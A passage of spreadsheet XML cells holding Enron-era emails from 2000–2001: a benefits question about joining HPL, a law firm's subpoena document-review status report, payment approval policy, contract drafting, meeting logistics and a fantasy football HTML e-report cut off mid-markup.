    <t>Houston Pipe Line Company</t>
  </si>
  <si>
    <t>Jeff,_x000D_
 We talked about my joining HPL after the sale was consummated several weeks _x000D_
ago.  You had indicated that you would work up some information and send it _x000D_
to me.  Is it ready?  Gary Prescott and I have verbally agreed to a level of _x000D_
compensation which I understand you are working into a document.  He has also _x000D_
assured me that I will be credited with my initial start date which is March _x000D_
9, 1967 and be fully vested in the various benefit, retirement and vacation _x000D_
plans.  Can you confirm this?  Enron has indicated that since I am over 55, I _x000D_
will be fully vested in any unvested options, however, all of my options will _x000D_
need to be exercised on the earlier of the original expiration date or a date _x000D_
that is 3 years from the time I leave Enron's employment.  They indicated _x000D_
that it makes no difference if I retire or terminate.  I can see no benefit _x000D_
in retirement from Enron because I am currently vested in the savings plan _x000D_
which I will roll over to an investment account when I leave Enron and I see _x000D_
no reason to sign up for the Enron Retirement Health Benefits because AEP _x000D_
appears to have a similar retirement health benefit plan.  Isn't this the _x000D_
case?_x000D_
 Please respond at your earliest opportunity so that I can better understand _x000D_
how I need to approach Enron concerning my possible departure from Enron for _x000D_
a career opportunity with HPL.</t>
  </si>
  <si>
    <t>Mon, 2 Jul 2001 22:44:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mmolland@brobeck.com'})</t>
  </si>
  <si>
    <t>frozenset({'c..williams@enron.com', 'b..sanders@enron.com'})</t>
  </si>
  <si>
    <t>Status report on document identification at Enron Corp. offices i n_x000D_
 San Francisco</t>
  </si>
  <si>
    <t xml:space="preserve">	Amanda Smith, Peter Meringolo,  and I met with officers and_x000D_
administrators at the San Francisco offices of Enron Corp. this morning and_x000D_
identified documents responsive to  the Dunn committee subpoena. Amanda and_x000D_
Peter then collected and reviewed potentially responsive documents in the_x000D_
afternoon. They will continue to do so, with the assistance of two_x000D_
paralegals, tomorrow. Assuming we do not produce documents relating to the_x000D_
development and siting of generation facilities ( which comprise the lion's_x000D_
chair of the documents in San Francisco) we estimate there are about ten_x000D_
boxes of responsive hard copy documents in the office. However, we have not_x000D_
yet reviewed any electronic documents.  The following summarizes these_x000D_
discussions and the status of document identification:_x000D_
_x000D_
	 Most of the documents in the SF office correspond to one of the_x000D_
three major functions of the office.  The predominant operation is the_x000D_
development of power generation facilities in the Western United States_x000D_
under the supervision of Dave Parquet. Second, the office markets wholesale_x000D_
power to municipal utilities and other customers under the direction of Mike_x000D_
McDonald. Both these operations are done by Enron North American and  both_x000D_
Parquay and McDonald are vice presidents of Enron North America. McDonald_x000D_
works closely with EPMI in Portland. The final significant function of the_x000D_
office consists of legislative and regulatory affairs, which is part of_x000D_
Enron Corp and managed by Sue Mara._x000D_
_x000D_
	  We reviewed many of the documents within the custody of persons_x000D_
working under the management of Parquet and Mara. McDonald is on vacation_x000D_
until June 11 and has not returned phone calls to his home message machine._x000D_
Given his close relationship to EPMI in Portland we need to reach him soon_x000D_
to interview him on the subject. He is said to have potentially sensitive_x000D_
pricing and financial information relating to wholesale power on his hard_x000D_
drive.  The following summarizes our review of the documents in the Parquet_x000D_
and Mara supervised operations._x000D_
_x000D_
	Mara:  Many documents may be privileged. Non-privileged documents do_x000D_
not appear especially sensitive- examples are reports of trade association_x000D_
meetings and PUC and other regulatory proceedings._x000D_
_x000D_
	Parquet: Parquet was on the board of ISO. He has about two boxes of_x000D_
responsive ISO information. Most appear non sensitive, but may require_x000D_
notice to ISO prior to production.. There is also some bid information_x000D_
regarding an Enron offer to buy a PG and E generating facility later_x000D_
purchased by Mirant. These documents are also non-sensitive. Parquet has_x000D_
financial documents, including the allocation of profit and loss to certain_x000D_
Enron subsidiaries._x000D_
	However, there are tens (50 to 100) of boxes of documents relating_x000D_
to power plants Enron has or is  planning to develop in the Western United_x000D_
States. Generally, these type of documents do not appear called for in the_x000D_
subpoena. However, embedded within these development plans are documents_x000D_
that are responsive to other categories of the subpoena and sensitive- such_x000D_
as pricing curves, information about future contracts, and forecasts of_x000D_
supply and demand for power.  Parquay says these are competitively sensitive_x000D_
documents. It would take several days to review these documents.  Further,_x000D_
many contain third party information subject to  confidentiality agreements_x000D_
with such third parties. If we produce them we would need to notify these_x000D_
third parties soon. I suggest we not produce these documents but do so_x000D_
openly by disclosing to Drivon that we are treating documents relating to_x000D_
siting of power plants not operated by Enron as non-responsive._x000D_
_x000D_
	McDonald: This operating unit has few hard copy documents. Most_x000D_
sensitive information is said to be on McDonald's hard drive, including_x000D_
financial information that reportedly shows how much money Enron made in_x000D_
California in the past year or two by selling wholesale power. Someone needs_x000D_
to reach McDonald so we can ask him about it._x000D_
_x000D_
	Document retention: The office manager says that a backup tape is_x000D_
made of the server and the "H" drives on each computer every day. 20 days of_x000D_
backup tapes are kept before they are overwritten. The backup tape from_x000D_
every fourth Friday of each month is kept permanently. They believe e-mail_x000D_
is so preserved on this back up tapes, but say that only people in "_x000D_
Houston" know for sure. We should find out. We asked the office manager to_x000D_
retain copies of all backup tapes going forward._x000D_
_x000D_
	EES: The EES personnel in San Francisco have few responsive_x000D_
documents. The Dunn subpoena asks for all of Enron's contracts for retail_x000D_
sale of power, which are also requested by the AG from EES. These  probably_x000D_
total 20 or so boxes. We will ask the EES offices in San Ramon and Costa_x000D_
Mesa offices, which house these contracts, to copy them and send them to us_x000D_
for our review. We will hold them until we make a decision whether to_x000D_
produce them, either to the AG or Dunn._x000D_
_x000D_
	PUC production: Enron previously produced about a half box of_x000D_
documents to the PUC. Most are responsive and should be also produced to_x000D_
Dunn._x000D_
_x000D_
	I expect we will have completed at least a cursory review of the_x000D_
responsive hard copy documents in San Francisco that do not pertain to plant_x000D_
construction and operation by tomorrow afternoon. We then need to review the_x000D_
documents on the hard drives of Parquay and McDonald, hopefully by Thursday_x000D_
afternoon. We will collect examples of  the most sensitive documents we find_x000D_
tomorrow and send them Tuesday evening to Bob Williams for review ._x000D_
_x000D_
=======================================================_x000D_
This email message is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply email and destroy all copies of the original message._x000D_
_x000D_
To reply to our email administrator directly, send an email to postmaster@brobeck.com_x000D_
BROBECK PHLEGER &amp; HARRISON LLP_x000D_
http://www.brobeck.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 09:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ben.gwaltney@enron.com', 'larry.dallman@enron.com'})</t>
  </si>
  <si>
    <t>Updated - Approval Authorizations</t>
  </si>
  <si>
    <t xml:space="preserve">Larry,_x000D_
_x000D_
The ENA Accounting groups have had wires for our NYMEX and OTC margin calls _x000D_
sent back due to improper signatures.  The timely flow of these monies is a _x000D_
vital component to our trading organization.  I believe that these two items _x000D_
fall under category "B" of the policy memo that was distributed (see email _x000D_
below) and therefore should only require the signature of an Accounting _x000D_
Director._x000D_
_x000D_
(B)  Those that ARE approved by an underlying contract or RAC require an _x000D_
Accounting Director approval of the payment  and general ledger coding._x000D_
_x000D_
We have a contractual obligation to our brokers and OTC counterparties to _x000D_
provide margin according to the guidelines set forth in our agreements with _x000D_
them.  These margin calls / returns of margin are monitored and amounts _x000D_
signed off on by the RAC Credit Group (Bill Bradford's area).   Backup from _x000D_
the Credit group should  be and is included with each wire._x000D_
_x000D_
I would appreciate your consideration of the above arguments to facilitate _x000D_
the movement of these monies on a go-forward basis.  I will call you tomorrow _x000D_
to discuss the possibility of having this change in effect for Monday Dec. _x000D_
11.  Thank you._x000D_
_x000D_
        Greg x35399_x000D_
_x000D_
---------------------- Forwarded by Greg Whiting/Corp/Enron on 12/06/2000 _x000D_
02:54 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
_x000D_
_x000D_
	_x000D_
	_x000D_
	From:  Larry Dallman                           11/07/2000 11:27 AM_x000D_
	_x000D_
_x000D_
To: Ben Gwaltney/NA/Enron@Enron, Andrew Zabriskie/Corp/Enron@ENRON, Linda _x000D_
Martin/GPGFIN/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Updated - Approval Authorizations_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Larry Dallman/GPGFIN/Enron on 11/07/2000 _x000D_
11:24 AM ---------------------------_x000D_
_x000D_
Richard Causey_x000D_
_x000D_
11/07/2000 09:18 AM_x000D_
Sent by: Sharron Westbrook_x000D_
To: Michael K Patrick/NA/Enron@Enron, Brent A Price/HOU/ECT@ECT, Rod _x000D_
Hayslett/FGT/Enron@ENRON, Jeffrey E _x000D_
Sommers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John Echols/Enron _x000D_
Communications@Enron Communications, Carol _x000D_
Howes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Howard Selzer/Corp/Enron@ENRON, _x000D_
Kevin Hughes/HOU/EES@EES, Bob Butts/GPGFIN/Enron@ENRON, Wes _x000D_
Colwell/HOU/ECT@ECT, Keith Marlow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kent _x000D_
Castleman/NA/Enron@Enron, Fernley Dyson/LON/ECT@ECT, Beth Apollo/LON/ECT@ECT, _x000D_
Ben F Glisan/HOU/ECT@ECT, Mary Perkins/HOU/ECT@ECT, Larry _x000D_
Dallman/GPGFIN/Enron@ENRON, Judy _x000D_
Knepshield/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jim _x000D_
Gearhart/Corp/Enron@ENRON, Tod A Lindholm/NA/Enron@Enron, Shawn _x000D_
Kilchrist/NA/Enron@Enron, Terrie Wheeler/GPGFIN/Enron@ENRON, John _x000D_
Berggren/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Lisa Sutton/FGT/Enron@ENRON, _x000D_
Misty Barrett/HOU/EES@EES, Dave Duncan/AA/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Updated - Approval Authorizations_x000D_
_x000D_
As mentioned in my previous memo regarding Cash Control Standards, approval _x000D_
authorizations are critical to our cash control environment.  Corporate _x000D_
Accounts Payable is actively pursuing a "Workflow" system to route invoice _x000D_
images for approval and processing.  This workflow solution will not be _x000D_
implemented until early 2001.  In the interim, an approval process will be _x000D_
implemented by AP and Treasury to ensure invoices have proper approvals and _x000D_
correct general ledger coding.  Effective Monday, November 20 the following _x000D_
approval authorizations will be required for all invoices, payment requests _x000D_
and wire transfer requests that are $1,000,000 or greater:_x000D_
_x000D_
(A)  Those NOT approved by an underlying contract or RAC require two _x000D_
approvals:  a Managing Director approval of the payment, and an Accounting _x000D_
Director approval of the general ledger coding.  _x000D_
_x000D_
(B)  Those that ARE approved by an underlying contract or RAC require an _x000D_
Accounting Director approval of the payment  and general ledger coding._x000D_
_x000D_
In both examples above, supporting documentation must be attached.  If not _x000D_
attached, then the payment will not be processed._x000D_
_x000D_
To assist us with implementing this approval process, I'm requesting each of _x000D_
you to accumulate signatures of the Managing Directors and Accounting _x000D_
Directors in your business unit using the attached form.  Please forward this _x000D_
information to Larry Dallman (JFR568) by Friday, November 10th._x000D_
_x000D_
This new process becomes effective Monday, November 20th.  It important to _x000D_
provide this information or payments greater than $1,000,000 will not be _x000D_
processed._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 11:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tolling templates</t>
  </si>
  <si>
    <t>As discussed.  I'm also trying to find out or you who lawyered a 222 MW _x000D_
tolling deal with Allegheny Energy Supply  relating to the _x000D_
Las Vegas Cogen II plant in Nevada, which was closed earlier this month._x000D_
_x000D_
_x000D_
[New Albany gas to power, EPMI owned the generation]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[Coal to Power, long form confirmation, counterparty owned the generation]</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 04:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting Time Change</t>
  </si>
  <si>
    <t>----- Forwarded by Mark Taylor/HOU/ECT on 10/19/2000 11:18 AM -----_x000D_
_x000D_
	Lydia Cannon_x000D_
	10/19/2000 10:05 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: Taffy Milligan/HOU/ECT@ECT_x000D_
		 Subject: Meeting Time Change_x000D_
_x000D_
Mark,_x000D_
_x000D_
Please forgive, I'll need to change your meeting time with Andy to 10:30 am _x000D_
tomorrow, October 20th.  Let me know if you are available._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Lydia</t>
  </si>
  <si>
    <t>Thu, 27 Apr 2000 03:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: DYNEGY MARKETING &amp; TRADE</t>
  </si>
  <si>
    <t>I can prepare a draft of a Master Agreement after credit sends me a _x000D_
worksheet.  I will forward your request to them and begin the process as soon _x000D_
as possible._x000D_
_x000D_
DP</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 16:42:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>PLEASE READ</t>
  </si>
  <si>
    <t xml:space="preserve">To:								Department:  	ENA Legal _x000D_
_x000D_
From:		Mark Taylor					Date:	May 11, 2001_x000D_
		Vice President and General Counsel_x000D_
_x000D_
Subject:	Enron North America Corp. NYMEX Hedge Exemption Applications_x000D_
													_x000D_
_x000D_
We are in the process of preparing applications for position limit exemptions for ENA's NYMEX energy commodities futures trading.  These applications require that ENA represent whether its officers, employees, owners, or agents have a power of attorney, control or have a financial interest in any related commodity future(s) account either individually or acting with another person pursuant to express or implied agreement._x000D_
_x000D_
Please direct any responses to my paralegal, Tana Jones, via intercompany email or call her at (713) 853-3399 by the end of business on June 15, 2001 if you have any power of attorney, control or have a financial interest in any commodity futures account (other than an ENA or other trading affiliate account)._x000D_
_x000D_
IF YOU DO NOT HAVE A COMMODITY FUTURES ACCOUNT, YOU DO NOT NEED TO RESPOND TO THIS REQUEST._x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 01:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paige.grumulaitis@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations on your promotion to Senior Director, a promotion that is _x000D_
very well deserved.  You do an amazing job of balancing children and work, _x000D_
and contributing so much on your work on 133.  </t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 14:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
----- Forwarded by Elizabeth Sager/HOU/ECT on 06/05/2001 11:53 AM -----_x000D_
_x000D_
_x000D_
	ARSystem &lt;ARSystem@mailman.enron.com&gt; 06/04/2001 07:15 PM 	   To: "elizabeth.sager@enron.com" &lt;elizabeth.sager@enron.com&gt;  cc:   Subject: Your Approval is Overdue: Access Request for stuart.zisman@enron.com	_x000D_
_x000D_
_x000D_
_x000D_
This request has been pending your approval for  35 days.  Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000029730&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000029730_x000D_
Request Create Date : 4/17/01 5:44:32 PM_x000D_
Requested For       : stuart.zisman@enron.com_x000D_
Resource Name       : VPN/IPASS_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 Oct 2001 13:25:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tammy.botsford@morganstanley.com'})</t>
  </si>
  <si>
    <t>Commodity Futures Customer Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Sara,_x000D_
_x000D_
I'm attaching a draft of the futures agreement to "get the ball rolling"_x000D_
again.  I believe I have included the terms you indicated were most_x000D_
important.  One item I would like to bring to your attention is the_x000D_
arbitration clause.  Morgan Stanley prefers to litigate disputes, but I_x000D_
can agree to NFA arbitration rather than litigation.  I know New York is_x000D_
our preferred location, and Texas is yours, so I thought that holding_x000D_
the arbitration in Chicago might equally inconvenience us.   Please let_x000D_
me know if this works for you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Tammy_x000D_
_x000D_
 - 1_Redline Enron Cust Agr.doc </t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 10:50:14 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Lyndon Taylor</t>
  </si>
  <si>
    <t>Yes.  He is now a big-time headhunter.  _x000D_
 _x000D_
I hope you had a great Thanskgiving.  Things are crazy here._x000D_
 _x000D_
Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Landwehr, Susan M. _x000D_
Sent: Monday, November 26, 2001 9:43 AM_x000D_
To: Steffes, James D._x000D_
Subject: Lyndon Taylor_x000D_
_x000D_
_x000D_
JIm--I was reading some clips last week and saw a quote from Lyndon Taylor at Heidrick and Struggles.  Is that our old colleague Lyndon???</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 10:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Heather,_x000D_
_x000D_
Are you available to participate?  I'm not sure what is on the agenda, but I _x000D_
thought I should check your availability._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/12/2000 05:23 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Dorothy Youngblood@ECT_x000D_
10/12/2000 05:21 PM_x000D_
To: Molly Harris/HOU/ECT@ECT, Gregg.Penman@enron.com, Jeffrey T _x000D_
Hodge/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Kay Mann/Corp/Enron@Enron_x000D_
cc: Suzanne Adams/HOU/ECT@ECT, Kaye Ellis/HOU/ECT@ECT, _x000D_
Lynn.pikofsky@enron.com _x000D_
_x000D_
Subject: Conference Call - eNovate Legal Templates Masters, LC and Guarantees_x000D_
_x000D_
_x000D_
_x000D_
This memo will confirm the above referenced Conference Call has been arranged _x000D_
for the date/time listed below:_x000D_
_x000D_
_x000D_
 DATE:   Monday, 10/16/2000_x000D_
_x000D_
 TIME:   2:00  P.M.- 3:00 P.M._x000D_
_x000D_
 DIAL-IN NUMBER: 1-888-422-7109_x000D_
_x000D_
 HOST CODE:  409-555_x000D_
_x000D_
 PARTICIPANTS _x000D_
  CODE:  381-755_x000D_
_x000D_
_x000D_
_x000D_
Please let us know if there are any questions._x000D_
_x000D_
Thanks you._x000D_
_x000D_
Dorothy_x000D_
_x000D_
713-853-6114 _x000D_
_x000D_
_x000D_
_x000D_
Participants:_x000D_
_x000D_
  Molly Harris - Host of Conference Call_x000D_
  Gregg Penman_x000D_
  Jeff Hodge_x000D_
  Sara Shackelton_x000D_
  Kay Mann_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 12:27:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'carol.st.@enron.com', 'julia.murray@enron.com', 'legal &lt;.schuler@enron.com&gt;', 'gareth.bahlmann@enron.com', 'e..haedicke@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
The meeting is in 3321._x000D_
 -----Original Message-----_x000D_
From: 	Sanders, Richard B.  _x000D_
Sent:	Friday, October 26, 2001 11:47 AM_x000D_
To:	Haedicke, Mark E.; Schuler, Lance (Legal); St. Clair, Carol; Murray, Julia; McCullough, Travis_x000D_
Subject:	_x000D_
_x000D_
This will confirm that the meetings with Weil for Sat and Sun will begin at 10am. Mark wants the entire team to be present for the Sat meeting. We will decide after that meeting who needs to be present on Sun. I have sent Weil a number of materials, including the 3rd quarter results given to the analysts. We anticipate that Sat will be a lawyers only meeting to discuss the corporate structure and the bankruptcy issues related to the different business units. The meeting will probably last 4-5 hours._x000D_
 _x000D_
The Sun meeting will include the commercial team. An agenda will be prepared, but most of the day will be devoted to information gathering and brainstorming.</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 10:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">What'd you do to my Cowboys?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Heather Robertson &lt;hrobertson@hbk.com&gt; on 09/01/2000 09:02:04 AM_x000D_
To: John.Arnold@enron.com_x000D_
cc:  _x000D_
Subject: RE: Young John?_x000D_
_x000D_
_x000D_
Just read it...great article!_x000D_
_x000D_
Have fun in Costa Rica... I hear it is amazing._x000D_
_x000D_
-----Original Message-----_x000D_
From: John.Arnold@enron.com [mailto:John.Arnold@enron.com]_x000D_
Sent: Thursday, August 31, 2000 4:10 PM_x000D_
To: hrobertson@hbk.com_x000D_
Subject: RE: Young John?_x000D_
_x000D_
_x000D_
_x000D_
The Fortune article is about grassroots change within a company.   It is_x000D_
written about the lady who started EOL, but I'm in it a little.   Chief of_x000D_
natural gas derivatives...I'm not really sure what that means.  I run the_x000D_
Nymex book now but not the floor..just the derivatives desk of five people._x000D_
_x000D_
I'm actually going to Costa Rica tomorrow morn thru Monday.   Never been_x000D_
but heard it's beautiful.  Next time you're in we'll go out._x000D_
J_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Heather Robertson &lt;hrobertson@hbk.com&gt; on 08/31/2000 01:20:05 PM_x000D_
_x000D_
To:   John.Arnold@enron.com_x000D_
cc:_x000D_
Subject:  RE: Young John?_x000D_
_x000D_
_x000D_
What do you mean?  I'm serious!_x000D_
_x000D_
So what Fortune article?  I only saw you in Time...  Pretty freaky to see_x000D_
someone you know like that!  What the heck is a "chief" of natural gas_x000D_
derivatives?!  Skilling's old job?_x000D_
_x000D_
Check out the Amazon (AMZN) chat on Yahoo... I was joking that all of my_x000D_
friends were in the press lately (i.e. YOU, as well as all my HBS buddies),_x000D_
so the guys on the trading floor thought this would be funny.  The best_x000D_
part_x000D_
is that someone thought they were serious and started in on the_x000D_
conversation!!  I do investor relations for a hedge fund in Dallas, so_x000D_
that's why they are talking about my IR/selling skills... but it's not_x000D_
exactly your typical corporate IR position considering our investor base._x000D_
_x000D_
I'm going to be in your neck of the woods tomorrow.  I'm visiting friends_x000D_
in_x000D_
Houston on Friday &amp; Saturday, then going to my sister's house in Bay City_x000D_
on_x000D_
Sat. night.  No firm plans, just getting out of Dallas.  Are you going to_x000D_
be_x000D_
around?_x000D_
_x000D_
I thought about you the night after I saw the article because I was in_x000D_
Snuffers, drinking a strawberry daiquiri...    =)  do you remember why??_x000D_
I_x000D_
think about that every time I go there...._x000D_
_x000D_
Take care and make money!_x000D_
_x000D_
-----Original Message-----_x000D_
From: John.Arnold@enron.com [mailto:John.Arnold@enron.com]_x000D_
Sent: Thursday, August 31, 2000 11:48 AM_x000D_
To: hrobertson@hbk.com_x000D_
Subject: Re: Young John?_x000D_
_x000D_
_x000D_
_x000D_
Glad to see you're having so much fun with this.  I've been here 5.5 years_x000D_
with nothing and then in one week I'm in Fortune and Time.  Pretty funny._x000D_
Things are going well here .  The big E just chugging along, bringing the_x000D_
stock price with it.  Wish I could tell you everything new in my life, but_x000D_
I think I just did._x000D_
Your long lost buddy,_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Heather Robertson &lt;hrobertson@hbk.com&gt; on 08/31/2000 10:10:09 AM_x000D_
_x000D_
To:   john.arnold@enron.com_x000D_
cc:_x000D_
Subject:  Young John?_x000D_
_x000D_
_x000D_
Is this "the 26-year-old chief of natural-gas derivatives"?  If so, you_x000D_
should write me back after you complete your "nine hours and $1 billion in_x000D_
trades" today!!   Does this mean I have to start calling you "Mr. John"?!_x000D_
It was great to see you're doing so well...._x000D_
Your long lost buddy,_x000D_
Heather_x000D_
_x000D_
Heather Lockhart Robertson_x000D_
HBK Investments LP_x000D_
Personal:_x000D_
214.758.6161 Phone_x000D_
214.758.1261 Fax_x000D_
Investor Relations:_x000D_
214.758.6108 Phone_x000D_
214.758.1208 Fax_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 00:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'glenn.wright@enron.com'})</t>
  </si>
  <si>
    <t>Re: ALAMAC--Employee Due Diligence</t>
  </si>
  <si>
    <t xml:space="preserve">The contact person at Cogentrix  whom we typically engage is Tom Bonner.  You _x000D_
might keep this name in mind if you cannot reach Tom McCarrin. The phone _x000D_
number provided will connect you to the Cogentrix operator._x000D_
_x000D_
- glenn_x000D_
_x000D_
_x000D_
_x000D_
From: Steve Van Hooser@ECT on 11/16/2000 06:09 PM_x000D_
To: Dolores Lenfest/HR/Corp/Enron@ENRON_x000D_
cc: Michelle Cash, Ozzie Pagan/HOU/ECT@ECT, Glenn Wright/Corp/Enron@ENRON, _x000D_
Dwight Beach _x000D_
_x000D_
Subject: ALAMAC--Employee Due Diligence_x000D_
_x000D_
Dee,_x000D_
_x000D_
Ozzie Pagan called me earlier today and informed me that Cogentrix's Tom _x000D_
McCarrin (sp?) had started to compile basic employee/employment information _x000D_
relative to the two North Carolina power plants that ENA is planning to _x000D_
acquire from Alamac Knit Fabrics.  I then spoke to Michelle Cash and she _x000D_
agreed with me that it would be best if you would call Mr. McCarrin in order _x000D_
to give him guidance as to the specific employee and benefits information _x000D_
that you are going to want to see.  I am told that he has not been given the _x000D_
Due Diligence Worksheet._x000D_
_x000D_
Mr. McCarrin's phone number is 704-525-4897.  Thank you in advance for your _x000D_
help in moving this aspect of the Alamac transaction forward._x000D_
_x000D_
Steve Van Hooser_x000D_
----- Forwarded by Steve Van Hooser/HOU/ECT on 11/16/2000 06:02 PM -----_x000D_
_x000D_
	Steve Van Hooser_x000D_
	11/03/2000 02:00 PM_x000D_
		 _x000D_
		 To: Ozzie Pagan/HOU/ECT@ECT, Glenn Wright/Corp/Enron@ENRON, Dwight Beach_x000D_
		 cc: Michelle Cash, Dolores Lenfest/HR/Corp/Enron@ENRON_x000D_
		 Subject: Employee Due Diligence Questions and Checklist_x000D_
_x000D_
Attached is the set of Employee Due Diligence Questions and Checklist that I _x000D_
have been e:mailing you about yesterday and today.  _x000D_
_x000D_
As you will note, it is quite extensive, and I rather doubt we'll receive _x000D_
helpful information by simply sending this document to Alamac.  Once you have _x000D_
had a chance to review the type of information that HR needs to have in order _x000D_
to conduct due diligence, please call me so that I can coordinate this effort _x000D_
with Michelle Cash and Dolores Lenfest from HR.  _x000D_
_x000D_
Steve Van Hooser_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 03:00:46 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Big E '01 12/21/01</t>
  </si>
  <si>
    <t>&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;&lt;html&gt;&lt;HEAD&gt;_x000D_
&lt;!--_x000D_
_x000D_
_x000D_
You are receiving these e-reports because you have signed up for_x000D_
CBS SportsLine.com Fantasy Football.  The default format for these_x000D_
reports is HTML, however if you are reading this text your_x000D_
mail reader is not displaying it as HTML.  To change to_x000D_
text mode, or to customize, reschedule, or turn off these_x000D_
reports please to to the URL below:_x000D_
_x000D_
http://football299.fantasy.sportsline.com/mp/options-ereports?league=bige01&amp;owner=67142.8_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--&gt;_x000D_
_x000D_
&lt;BASE HREF="http://football299.fantasy.sportsline.com/mp/"&gt;_x000D_
&lt;/HEAD&gt;&lt;BODY TEXT="#00000" ALINK="#ffff00" LINK="#0000ff" VLINK="#0000ff" BGCOLOR=#000099&gt;&lt;CENTER&gt;&lt;TABLE BORDER=0 WIDTH=716 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF=http://www.sportsline.com/links/6/1/163/sffer1218th.cgi&gt;&lt;IMG BORDER=0 SRC=http://images.commissioner.com/images/splash/football/SPLN_mgmt_ereport_header.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE WIDTH=100% CELLPADDING=10 CELLSPACING=0 BORDER=0 BGCOLOR="#ffffff"&gt;&lt;TR&gt;&lt;TD&gt;&lt;br&gt;Attention Fantasy Players! Cant find that perfect gift? Let MVP.com make it easy for you! Save 10% on your next purchase when you purchase a Gift Certificate from now until 12/27/01. &lt;a href=http://www.sportsline.com/links/6/1/217/sffer1218e.cgi&gt;Click Here for Details&lt;/a&gt;.  &lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
_x000D_
	&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;_x000D_
	&lt;TR&gt;&lt;TD bgcolor=black&gt;&lt;FONT FACE="verdana,arial,helvetica" size=1_x000D_
color=white&gt;&lt;B&gt;Brought to you by&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
	&lt;/TABLE&gt;_x000D_
	&lt;TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD colspan=2&gt;_x000D_
&lt;IMG SRC="http://images.commissioner.com/images/ads/ereports/sponsorbar15.gif" USEMAP="#menu.map" width="417" height="25" border="0" ALT="Sponsorship Bar"&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;MAP NAME="menu.map"&gt;_x000D_
&lt;AREA shape="rect" coords="0, 1, 83, 25"_x000D_
href="http://www.sportsline.com/links/6/1/217/sffer1218e.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="83, 1, 166, 25"_x000D_
href="http://www.sportsline.com/links/6/1/226/sffer1218c.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="166, 1, 249, 25"_x000D_
